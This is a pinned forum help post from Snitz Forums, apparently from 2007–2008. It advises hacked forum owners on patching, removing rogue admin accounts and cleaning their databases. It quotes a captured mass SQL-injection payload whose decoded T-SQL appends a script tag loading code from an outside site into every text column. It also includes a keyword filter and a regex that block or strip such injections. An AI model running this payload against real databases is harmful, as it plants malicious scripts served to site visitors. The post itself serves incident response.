Snitz Forums 2000
Snitz Forums 2000
Home | Profile | Register | Active Topics | Members | Search | FAQ
Username:
Password:
Save Password
Forgot your Password?

 All Forums
 Help Groups for Snitz Forums 2000 Users
 Help: General / Classic ASP versions(v3.4.XX)
 If you've been hacked (Updated: 2008-06-14)
 New Topic  Topic Locked
 Printer Friendly
Author Previous Topic Topic Next Topic  

AnonJr
Moderator

United States
5765 Posts

Posted - 18 December 2007 :  13:31:49  Show Profile  Visit AnonJr's Homepage
There have been a number of people hit by a hacker (or group of hackers) who are taking advantage of those who have not added the latest security patch(s) and/or have other vulnerabilities in their code due to old/insecure MODs and/or custom additions.

As a result, we've been getting a steady stream of people with essentially the same post - "I've been hacked/My forum has a virus - now what?" So here's the answer as it stands so far:

Check the "Announcements: Security Related Bug Fixes" forum - and subscribe to it so you'll be notified of any other issues that pop up. This is probably a result of the issue that was patched on 1 Dec 2007.

I'd also take a look through the "DEV Bug Reports (Open)" forum and fix any other outstanding issues. (Assuming you haven't already)

After applying all the patches I would go to the Admin Options and check the "Admin/Moderator List" to see if they created any extra Admin accounts. If you find an account that is set up as an Admin - but shouldn't be - demote them and then lock the account. This prevents them from using the same account name and e-mail address.

In some cases - mainly people who have added an early version of the Dec. patch - the unsuccessful hack attempt causes a "Type Mismatch" error to occur on the members.asp page where the hacker's account is listed.

To fix a "broken" members.asp page, you should do the following:<ol type="1">
  • Log in as the Super Admin (usually the very first account created when you set up the forum) and go to Admin Options, then select "(Alternate MOD Setup)"

  • Paste the following code into the box:
    [UPDATE]
    MEMBERS
    M_LASTHEREDATE#'20080414000000'#MEMBER_ID = IDOFDODGYUSER
    [END]
    Replace IDOFDODGYUSER with the numeric ID of the last user displayed in the broken list, this will be the attempted hacker. If you hover your mouse over the name of the account on members.asp, you'll see the ID in the URL on the status bar at the bottom of your browser.

    The date/time is stored as a string, in YYYYMMDDHHMMSS format, just use the current date (example shows 14 April 2008)

  • Press the submit button and it should sort out the problem with members.asp. Don't forget to lock the account afterwards...
  • </ol id="1">

    Then I'd go through all the other Admin Options to see what might have been changed. Make sure they didn't enable HTML (assuming you didn't have it enabled to begin with). Pay close attention to the text for down.asp (usually entered in when you click on "Shut Down the Forum" from the admin page). They seem to like to stick some <iframe /> or other HTML in there that pulls various ActiveX controls etc. that you really don't want. I'd really check this first so you can shut the forum down while you work on the rest - that way they can't jack with anything else while you are doing your cleanup.

    While you are in the Admin Options, don't forget to check the bad words filter. Some sly individuals have been using it to substitute various words with links to scripts etc.

    Next up is to run through the forum descriptions for every forum you have. Go to "Edit Forum Properties" for each and every forum you have set up and look to see if they didn't add any <iframe /> or other unwanted HTML to the forum's description. Like with down.asp they've been known to add all sorts of fun stuff there...

    Then I'd start going through the files and see if any had been modified or if there are any new files that weren't there before. Odds are that you aren't going to find anything here if your admins don't have some sort of upload access to the server.

    For the most part they've been limited to only the kind of havoc an Admin. account can inflict. While they won't be able to change passwords for other admin accounts, they could play with your moderator's accounts - you may want to let all your moderators know that they should check/change their passwords.

    As I mentioned at the beginning, some of these hacks are not the result of Snitz itself, but are being perpetrated through other avenues in the site. In the server logs you'll see something like:
    2008-06-13 07:34:55 xxx.xxx.xxx.xxx GET /forum/topic.asp TOPIC_ID=2486;DECLARE%20@S%20VARCHAR(4000);..{some big long string}..

    If you paste the hex portion of the code into the converter found here, you'll see the SQL it was trying to run. Typically something like:
    DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.differenturls.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor



    Astralis has posted some code to help clean the script from the database. Here's what he'd posted:
    quote:
    quote:<hr height="1" noshade id="quote">Several things:

    1) This hack had nothing to do with Snitz. They didn't change the member levels as I initially believed.
    2) I discovered that some of my SQL Injection script simply DID NOT work. Lesson: Test your injection script!
    3) Back up your database.
    4) Many people are dealing with this right now. I used the following script to go through the rows quickly. Bill Wilkinson on www.ASPMessageboard.com wrote it. Depending on the size of your database, run it on just a couple of fields at a time. This is what I used to update the Snitz Member's table.

    Set zap = New RegExp
    zap.Pattern = "\<" & "script[\s\S]*?\<\/script\>"
    zap.IgnoreCase = True
    zap.Global = True
    
    '#### CAUTION ####
    '  Either this regexp or the script injection trimmed a couple of 
    '  the text fields such as M_SIG while deleting the injection.  I 
    '  simply told my members to recreate it.  I suspect it was the script
    '  injection, though. There are other fields you need to add...it's 
    '  self-explanatory if you compare it with your database table design.
    '  Uncomment only a couple of fields at a time.  If you try to run 
    '  them all at the same time your database will timeout.
    '
    '  Also, if you have a field that is NULL, run the code using this 
    '  model or else you will get errors:
    '
    '    uname = RS("username")
    '    If Not IsNull(uname) Then If uname <> "" Then RS("username") = zap.Replace(uname,"") 
    '
    '############
    
    Set RS = Server.CreateObject("ADODB.Recordset")
    RS.Open "FORUM_MEMBERS", openyourconnection, 3, 3
    Do Until RS.EOF
            'RS("M_AIM") = zap.Replace( RS("M_AIM"), "" )
    	'RS("M_ICQ") = zap.Replace( RS("M_ICQ"), "" )
    	'RS("M_Yahoo") = zap.Replace( RS("M_Yahoo"), "" )
    	'RS("M_MSN") = zap.Replace( RS("M_MSN"), "" )	
    	'RS("M_FIRSTNAME") = zap.Replace( RS("M_FIRSTNAME"), "" )	
    	'RS("M_LASTNAME") = zap.Replace( RS("M_LASTNAME"), "" )	
            'RS("M_OCCUPATION") = zap.Replace( RS("M_OCCUPATION"), "" )
            'RS("M_SEX") = zap.Replace( RS("M_SEX"), "" ) 
    	'RS("M_HOBBIES") = zap.Replace( RS("M_HOBBIES"), "" )	
    	'RS("M_LNEWS") = zap.Replace( RS("M_LNEWS"), "" )			
    	'RS("M_QUOTE") = zap.Replace( RS("M_QUOTE"), "" )			
    	'RS("M_MARSTATUS") = zap.Replace( RS("M_MARSTATUS"), "" )			
    	'RS("M_BIO") = zap.Replace( RS("M_BIO"), "" )	
    	'RS("M_LINK1") = zap.Replace( RS("M_LINK1"), "" )			
    	'RS("M_LINK2") = zap.Replace( RS("M_LINK2"), "" )			
    	'RS("M_CITY") = zap.Replace( RS("M_CITY"), "" )							
    	'RS("M_STATE") = zap.Replace( RS("M_STATE"), "" )			
    	'RS("M_KEY") = zap.Replace( RS("M_KEY"), "" )			
    	'RS("M_PWKEY") = zap.Replace( RS("M_PWKEY"), "" )				
    	'RS("M_PHOTO_URL") = zap.Replace( RS("M_PHOTO_URL"), "" )					
    	'RS("M_NEWEMAIL") = zap.Replace( RS("M_NEWEMAIL"), "" )					
    	'RS("M_PMBLOCKLIST") = zap.Replace( RS("M_PMBLOCKLIST"), "" )					
    	RS.Update
        RS.MoveNext
    Loop
    RS.Close
    response.write "finished"



    Podge has posted a temporary fix (a better variation of what fubardk had posted earlier in that thread) for those that haven't found out where its getting through. As long as your site has some sort of common header file, you can paste the following in it and it will ameliorate part of the problem. Please note this is not a permanent fix, nor is it something that is impossible to work around - it just makes it that much harder for the hacker to get in.
    if instr(request.querystring,";")>0 or instr(lcase(request.querystring),"declare") >0 or instr(lcase(request.querystring),"cast")>0 then Response.End



    For those using MS SQL Server, Classicmotorcycling has posted something of a more permanent fix:
    quote:
    quote:<hr height="1" noshade id="quote">The fix I have found to stop it happening is to restore to the latest good backup of your Database (unless you want to go through each tables and their fields and remove it) then in Query Analizer run the following:
    DENY SELECT ON SYSOBJECTS TO [User listed in config.asp of your forum]
    DENY SELECT ON SYSCOLUMNS TO [User listed in config.asp of your forum]


    As an example:
    DENY SELECT ON SYSOBJECTS TO Snitz_User
    DENY SELECT ON SYSCOLUMNS TO Snitz_User



    It does come with one caveat:
    quote:
    quote:<hr height="1" noshade id="quote">Originally posted by ruirib
    <br />You should be aware that's not really a fix. It will stop that kind of hack, but the hole is still there and it can be used to inject different SQL. You should not really relax with such a fix. It will avoid some of the symptoms of your problem, but it won't solve the problem.
    For example, using the same searching strategy and knowing the Snitz tables names, nothing stops them from dropping all your tables and this fix won't stop it.

    As hard is that may be, there is no way around sanitizing all your input. If you don't do that, the hole is still there to be used by those who search for it with enough persistence!



    Most of the common problems (and some not so common ones) have been addressed in the forums already. I add those issues and solutions here as I have time. If you don't find what you need in this topic, please do a search before starting a new one.

    If you are still having problems after having done all this (including searching), post a new topic in this forum with: a descriptive title, what you have tried and/or are having trouble with, and a description of the problem. We'll get you back up and running come hell or high water.

    <hr noshade size="1">
    2008-06-14: Updated to include information on non-snitz related hacks, and solutions posted by Astralis, fubardk, Podge, and Classicmotorcycling.

    2008-05-06: Updated to include information about the sly use of the bad words filter.

    2008-04-28: Updated to include information on the "broken" members.asp page as well as how to fix it. Also fixed some typos and minor verbiage changes.

    2008-04-23: Updated to include some keywords that people seem to be looking for instead of the typical ones... and to refine the wording here and there. Nothing truly new for those that have read it before.

    Edited by - AnonJr on 14 June 2008 19:33:31
      Previous Topic Topic Next Topic  
     New Topic  Topic Locked
     Printer Friendly
    Jump To:
    Snitz Forums 2000 © 2000-2021 Snitz™ Communications Go To Top Of Page
    This page was generated in 0.08 seconds. Powered By: Snitz Forums 2000 Version 3.4.07